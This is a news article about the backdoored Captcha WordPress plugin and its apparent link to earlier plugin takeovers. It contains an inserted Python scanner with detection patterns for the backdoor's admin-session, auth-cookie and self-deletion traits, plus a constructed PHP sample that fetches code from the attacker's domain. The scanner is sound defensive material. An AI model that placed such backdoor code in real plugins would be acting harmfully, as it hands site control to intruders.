A WordPress plugin installed on over 300,000 sites was recently modified to download and install a hidden backdoor. The WordPress team has intervened and removed this plugin from the official WordPress Plugins repository, also providing clean versions for affected customers.

Known only as Captcha, the plugin was one of the most popular CAPTCHA plugins on the official WordPress site and was the work of a well-established plugin developer named BestWebSoft, a company behind many other popular WordPress plugins.

Plugin sold in September, backdoored in December

BestWebSoft sold the free version of its Captcha plugin to a new developer named Simply WordPress on September 5, according to a blog post on the company's site.

Exactly three months after the sale, the plugin's new owner shipped Captcha version 4.3.7, which contained malicious code that would connect to the simplywordpress.net domain and download a plugin update package from outside the official WordPress repository (against WordPress.org rules). This sneaky update package would install a backdoor on sites using the plugin.

"This backdoor creates a session with user ID 1 (the default admin user that WordPress creates when you first install it), sets authentication cookies, and then deletes itself," says Matt Barry, Wordfence security researcher. "The backdoor installation code is unauthenticated, meaning anyone can trigger it."

Further, the plugin also contains code to trigger a clean update that removes all traces of the backdoor, should the attacker decide to erase his tracks.
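The traits described above (a forced session as user ID 1, authentication cookies set without a login, self-deletion, and an update fetched from an off-repository host) can be turned into a file-level check. The scanner below is an added example, not Wordfence or WordPress code; the regexes are assumptions about how such code would appear in PHP, and only the simplywordpress.net host comes from the incident report.

```python
"""Scan a WordPress plugins tree for the backdoor traits described above.

Added example, not code from Wordfence or WordPress. The signatures are
assumptions; only the simplywordpress.net host is from the incident report.
"""
import os
import re
import tempfile

# Off-repository update host named in the incident report.
OFF_REPO_HOSTS = ("simplywordpress.net",)

# Hypothetical signatures for the described behaviour: forcing the current
# user to ID 1, setting auth cookies outside a login, and self-deletion.
SIGNATURES = {
    "forced_admin_session": re.compile(r"wp_set_current_user\s*\(\s*1\s*\)"),
    "auth_cookie_set": re.compile(r"wp_set_auth_cookie\s*\("),
    "self_delete": re.compile(r"unlink\s*\(\s*__FILE__\s*\)"),
}

def scan_source(src):
    """Return the set of indicator names found in one PHP source string."""
    hits = {name for name, rx in SIGNATURES.items() if rx.search(src)}
    hits.update("off_repo_host:" + h for h in OFF_REPO_HOSTS if h in src)
    return hits

def scan_plugin_dir(root):
    """Walk a plugins tree; map relative paths of flagged files to their hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_source(fh.read())
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings

# Constructed samples: a benign plugin file and one mimicking the traits.
BENIGN = "<?php\nadd_action('init', function () { echo 'captcha'; });\n"
SUSPECT = ("<?php\nwp_set_current_user(1);\nwp_set_auth_cookie(1);\n"
           "file_get_contents('https://simplywordpress.net/update.zip');\n"
           "unlink(__FILE__);\n")

def demo():
    """Write the constructed samples to a temp tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "captcha"))
        for fname, body in (("captcha/good.php", BENIGN),
                            ("captcha/plugin-update.php", SUSPECT)):
            with open(os.path.join(root, fname), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_plugin_dir(root)

if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, sorted(hits))
```

Point `scan_plugin_dir` at a site's `wp-content/plugins` directory to run it against real installs; a hit on any single signature warrants a manual review of that file, and a hit on all of them in one file matches the pattern described in the report.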

Backdoor discovered by accident

Initially, the update didn't catch anyone's eye and we presume it would have continued to fly under the radar even today.

What exposed the backdoor was not a user complaint but a copyright claim from the WordPress team. A few days ago, the WordPress team removed the Captcha plugin from the official WordPress.org website because the plugin's new author had used the "WordPress" trademark in his name and plugin branding.

The plugin's removal from the WordPress site alerted the security team at Wordfence, a company that provides a powerful Web Application Firewall (WAF) for WordPress sites.

"Whenever the WordPress repository removes a plugin with a large user base, we check to see if it was possibly due to something security-related," Barry says, explaining how they came to review the plugin's code and spot the backdoor.

WordPress team ships plugin version without malicious code

Once they spotted the backdoor, Wordfence notified the WordPress security team, who then put together a clean version of the Captcha plugin (version 4.4.5), which they immediately started to force-install on all affected websites, removing backdoored versions from users' sites. Over 100,000 sites received the clean version of the Captcha plugin over the weekend, the WordPress team said.

Since first coming across the backdoor, the Wordfence team has been looking closely into the dealings of the Simply WordPress company.

Experts say they've discovered backdoored update packages on the simplywordpress.net domain for other WordPress plugins such as:

    Covert me Popup
    Death To Comments
    Human Captcha
    Smart Recaptcha
    Social Exchange

None of these names appear to correspond to plugins hosted on the official WordPress repository.

Plugin's new author has done this before

Clues in the simplywordpress.net domain have put the Wordfence team on the trail of a known abuser they have exposed in the past.

According to Barry, the Simply WordPress company appears to be connected to Mason Soiza, an individual they have previously linked to backdoors in the Display Widgets (over 200,000 installs) and 404 to 301 (70,000 installs) plugins.

Wordfence claims Soiza has been buying WordPress plugins and adding backdoor code to each one. Soiza is allegedly using the backdoored versions to insert hidden backlinks to spammy domains, including for Payday Loans, a company he owns. The entire purpose of this business is to help Soiza's sites rank better in search results.

All these connections are explained in fine detail in two Wordfence reports, one detailing the recent Captcha backdoor, and another detailing past incidents.
